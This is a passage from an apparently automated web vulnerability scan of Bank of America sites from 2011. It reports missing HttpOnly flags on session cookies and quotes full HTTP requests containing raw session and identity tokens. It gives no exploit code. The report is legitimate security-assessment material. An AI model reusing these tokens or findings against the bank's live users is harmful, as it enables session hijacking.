http://factsaboutfees.bankofamerica.com/assets/img/bc_contentBlock.gif
http://factsaboutfees.bankofamerica.com/assets/img/bg_clarity_center.jpg
http://factsaboutfees.bankofamerica.com/assets/img/bg_clarity_left.jpg
http://factsaboutfees.bankofamerica.com/assets/img/bg_clarity_right.jpg
http://factsaboutfees.bankofamerica.com/assets/img/bg_relatedLinks.gif
http://factsaboutfees.bankofamerica.com/assets/img/bg_relatedLinksBtm.gif
http://factsaboutfees.bankofamerica.com/assets/img/bg_sitemap_btm.jpg
http://factsaboutfees.bankofamerica.com/assets/img/bg_sitemap_center.gif
http://factsaboutfees.bankofamerica.com/assets/img/bg_sitemap_corner_left.gif
http://factsaboutfees.bankofamerica.com/assets/img/bg_sitemap_corner_right.gif
http://factsaboutfees.bankofamerica.com/assets/img/bg_tabPanel.gif
http://factsaboutfees.bankofamerica.com/assets/img/bg_widget.gif
http://factsaboutfees.bankofamerica.com/assets/img/blue_square.gif
http://factsaboutfees.bankofamerica.com/assets/img/favicon.ico
http://factsaboutfees.bankofamerica.com/assets/img/feedback/blue_fb_en-US.gif
http://factsaboutfees.bankofamerica.com/assets/img/feedback/blue_oo.gif
http://factsaboutfees.bankofamerica.com/assets/img/ico-alerts.gif
http://factsaboutfees.bankofamerica.com/assets/img/ico-glossary.gif
http://factsaboutfees.bankofamerica.com/assets/img/ico-pdf.gif
http://factsaboutfees.bankofamerica.com/assets/img/ico-tag.gif
http://factsaboutfees.bankofamerica.com/assets/img/ico_redArrow.gif
http://factsaboutfees.bankofamerica.com/assets/img/infographic/201.jpg
http://factsaboutfees.bankofamerica.com/assets/img/lifestyle/201.jpg
http://factsaboutfees.bankofamerica.com/assets/img/logo_BofA.gif
http://factsaboutfees.bankofamerica.com/assets/img/nav1_off.gif
http://factsaboutfees.bankofamerica.com/assets/img/nav2_off.gif
http://factsaboutfees.bankofamerica.com/assets/img/nav2_on.gif
http://factsaboutfees.bankofamerica.com/assets/img/nav2_over.gif
http://factsaboutfees.bankofamerica.com/assets/img/nav3_off.gif
http://factsaboutfees.bankofamerica.com/assets/img/nav4_off.gif
http://factsaboutfees.bankofamerica.com/assets/img/navBar_bg.gif
http://factsaboutfees.bankofamerica.com/assets/img/noflash.gif
http://factsaboutfees.bankofamerica.com/assets/img/spacer.gif
http://factsaboutfees.bankofamerica.com/assets/img/tabActive_1.gif
http://factsaboutfees.bankofamerica.com/assets/img/title_tagline.gif
http://factsaboutfees.bankofamerica.com/assets/img/volume_control/closed_button.png
http://factsaboutfees.bankofamerica.com/assets/img/volume_control/scrollerThumb.png
http://factsaboutfees.bankofamerica.com/assets/img/volume_control/video_off.png
http://factsaboutfees.bankofamerica.com/assets/img/volume_control/video_on.png
http://factsaboutfees.bankofamerica.com/assets/js/app.js
http://factsaboutfees.bankofamerica.com/assets/js/jquery-1.3.2.min.js
http://factsaboutfees.bankofamerica.com/assets/js/jquery-ui-1.7.2.custom.min.js
http://factsaboutfees.bankofamerica.com/assets/js/oo_engine.js
http://factsaboutfees.bankofamerica.com/assets/js/swfobject.js
http://factsaboutfees.bankofamerica.com/assets/swf/shell.swf
http://factsaboutfees.bankofamerica.com/assets/video/1A.flv
http://factsaboutfees.bankofamerica.com/crossdomain.xml
http://factsaboutfees.bankofamerica.com/manage-credit-card-fees/transaction-fees-and-aprs/
http://factsaboutfees.bankofamerica.com/servlets/Qanda
http://factsaboutfees.bankofamerica.com/servlets/Xml/qanda.xml
https://www2.bankofamerica.com/deposits/checksave/olbextended/index.cfm
https://www9.bankofamerica.com/home-loans/mortgage-purchase.go
https://www9.bankofamerica.com/home-loans/surveyShowAction.go
https://www9.bankofamerica.com/insurance/surveyShowAction.go

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

4.1. http://homeloans.bankofamerica.com/docroot/js/rates.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://homeloans.bankofamerica.com
Path:	/docroot/js/rates.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=475F62F0B39EAB83BB580E4F6C4552A9; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docroot/js/rates.jsp HTTP/1.1
Host: homeloans.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://homeloans.bankofamerica.com/en/home.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; NSC_CbolPgBnfsjdb=445b32097852; ORIGINATIONS.BANKOFAMERICA.COM=NVH9yAytgRfRe9B2T5E5DnJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCGMdnxtGnFYcLLS4d0z1cVF6+Eadv4AI9+bNPv01vshxlZTgPSXNNZwboayRUVJc8EVeQMImPZgUdhtBeLKW4JXjsjhtMBpdvWxy/US6Q2nS88C2FauT066xHiMY2SsLR3p7WQpFbtuUl0vJm5f5Gt1GoVOJnXXfIQtYGZ88/jMIUeDn0VIPIj14ESopT5jmKrcAXb7xIj67CZIi6U/51S8dduhgi0ysC3fSV1SfAcARcnDbZ6BQQfHYxACjVEeuI5aZ/E6XgzlzfXowxgSiv33laZECGFyhCxSQPG/VHBg+ncz9NKOm3bqtUoxC7mmihAedmYO2XudnvWKZc6jz9I/TVSJNdSVwZpCBsTmbJnhVSNVJgG7SH5LGXoyywRrSog5d9VAHEw/bmPePxAOUiC/zAmxxDcqBVN6aEqZJdVlZLMiG6HpVXshVGonkEv5J5k14qsR79fahnqulfNjKlqxpBfdqqdFp9Kx7YqmM+dM5ofD3FgqVRWmMk59qcGkDn; state=CT; throttle_value=72

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:41:55 GMT
Set-Cookie: JSESSIONID=475F62F0B39EAB83BB580E4F6C4552A9; Path=/
Vary: Accept-Encoding
Content-Type: text/javascript;charset=UTF-8
Content-Language: en
Content-Length: 33673
X-Pad: avoid browser bug

var rateDataLastModified='10-06-11 09:17 ET';
var statePurposeProductRateData={

   "RI":{

       "PURCHASE":{

           "7/1 ARM":{
               "rate":"3.500","apy":"3.512","points":"1.000"
           },
           "30 Ye
...[SNIP]...

4.2. http://homeloans.bankofamerica.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://homeloans.bankofamerica.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=5B8E1872D573810623D72970FC9C0787; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: homeloans.bankofamerica.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; CMAVID=50021315153052143970353; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; state=CT; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; JSESSIONID=2FC8683428618CCB923BC1AD84C576C9; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852

Response

HTTP/1.1 404 Not Found
Date: Thu, 06 Oct 2011 13:48:56 GMT
Set-Cookie: JSESSIONID=5B8E1872D573810623D72970FC9C0787; Path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 10204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta content="tex
...[SNIP]...

4.3. https://privacyassist.bankofamerica.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://privacyassist.bankofamerica.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDCUDAQBDB=LGGGDNKCCJLBJOBHPMKAIFDJ; secure; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: privacyassist.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; state=CT; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1317909171194

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 188
Content-Type: text/html
Expires: Thu, 06 Oct 2011 13:54:48 GMT
Location: https://privacyassist.bankofamerica.com/pages2/English/MainPage.asp
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCUDAQBDB=LGGGDNKCCJLBJOBHPMKAIFDJ; secure; path=/
Date: Thu, 06 Oct 2011 13:54:47 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://privacyassist.bankofamerica.com/pages2/English/MainPage.asp">here</a>.</body>

4.4. https://www9.bankofamerica.com/insurance/life-and-health/term-life/overview.go previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www9.bankofamerica.com
Path:	/insurance/life-and-health/term-life/overview.go

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0000k15U7rwYXDSaqSMIc7N-NtB:14b1t9o9c; Path=/; Secure
JSESSIONID=0000J4FB3TGDEbHcd8CNmO8bVmR:14b1t9o9c; Path=/; Secure

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /insurance/life-and-health/term-life/overview.go HTTP/1.1
Host: www9.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; mbox=check#true#1317905950|session#1317905889373-229814#1317907750; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; state=CT; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=72

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 12:58:42 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: SAMEORIGIN
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000k15U7rwYXDSaqSMIc7N-NtB:14b1t9o9c; Path=/; Secure
Set-Cookie: JSESSIONID=0000J4FB3TGDEbHcd8CNmO8bVmR:14b1t9o9c; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 24983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>

<
...[SNIP]...

4.5. https://www9.bankofamerica.com/insurance/overview.go previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www9.bankofamerica.com
Path:	/insurance/overview.go

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0000uwgM0SGeVZ9ObHhnW7b6fWD:14b1t9te4; Path=/; Secure
JSESSIONID=00006BF27EMIBpp-xVBz4bpLScK:14b1t9te4; Path=/; Secure

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /insurance/overview.go HTTP/1.1
Host: www9.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; mbox=check#true#1317905950|session#1317905889373-229814#1317907750; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; state=CT; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:44:56 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: SAMEORIGIN
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000uwgM0SGeVZ9ObHhnW7b6fWD:14b1t9te4; Path=/; Secure
Set-Cookie: JSESSIONID=00006BF27EMIBpp-xVBz4bpLScK:14b1t9te4; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 39789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>

...[SNIP]...

4.6. https://www9.bankofamerica.com/insurance/property-and-auto/overview.go previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www9.bankofamerica.com
Path:	/insurance/property-and-auto/overview.go

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0000GvCKcO95bKlD7swNsDBseos:14b1t9p98; Path=/; Secure
JSESSIONID=0000RTNuokUto4PXIF7QXQuMceW:14b1t9p98; Path=/; Secure

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /insurance/property-and-auto/overview.go HTTP/1.1
Host: www9.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; 